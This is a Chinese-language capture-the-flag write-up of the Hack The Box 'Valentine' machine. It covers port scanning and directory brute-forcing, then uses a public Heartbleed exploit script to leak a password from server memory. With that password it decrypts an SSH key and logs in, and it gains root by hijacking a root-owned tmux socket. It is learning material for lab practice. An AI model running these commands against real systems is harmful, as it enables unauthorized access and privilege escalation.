【Hack The Box】linux练习-- Valentine

HTB 学习笔记

【Hack The Box】linux练习-- Valentine

---

🔥系列专栏：Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间：🌴2022年11月10日🌴
🍭作者水平很有限，如果发现错误，还望告知，感谢！

信息收集

22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 964c51423cba2249204d3eec90ccfd0e (DSA)
|   2048 46bf1fcc924f1da042b3d216a8583133 (RSA)
|_  256 e62b2519cb7e54cb0ab9ac1698c67da9 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
1
2
3
4
5
6
7
8
9
10
11

只有一个http或者https应该会有信息泄漏
进行一下目录爆破
主要扫一下php,txt
在http扫到了dev目录

有一个hex编码的文件，解密之后如下是一个加密的rs密钥文件
那么接下来就是要找到这个rsa文件的密码，也可能爆破，但是爆破我们放在最后

继续枚举https的目录
发现了如下的两个加解密php文件
但是我们没有任何的密文

这个时候要漏扫一下，nikto或者nmap

nmap --script vuln 10.129.1.254
1

发现心脏滴血漏洞
这个漏洞比较高威
我们可以获得内存信息
利用方法

python 32764.py 10.10.10.79 | grep -v "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
1

00有16个，是去掉空行的意思

发现base64编码如下
aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==

放入发现的解码PHP
得到密码 heartbleedbelievethehype
这个密码可能是密钥的，也可能是ssh的
而用户名
刚才扫出来的就是hype
没有确切的根据
但不就是那句话么

try hard

如下将加密密钥转变为正常密钥

openssl rsa -in id_rsa -out id1_rsa  
1

ssh -i valentine_key hype@10.10.10.79
1

提权

可以直接脏牛
单这里用个别的方法
注意看用户目录下的 .bash_history
如果不是0字节，就打开看看

发现了这个tmux，（最上面的最先执行）它先是直接执行，然后应该是错了，然后就点开帮助，然后执行了
我们照猫画虎
提权成功
tmux -S /.devs/dev_sess

这种情况呢我们不需要什么验证，可以的执行过的命令，直接执行即可，应试技巧

ps -ef | grep tmux
虽然我们知道tmux是一种套接字协议，并且审查了他的进程发现以root运行，但是直接干就完事了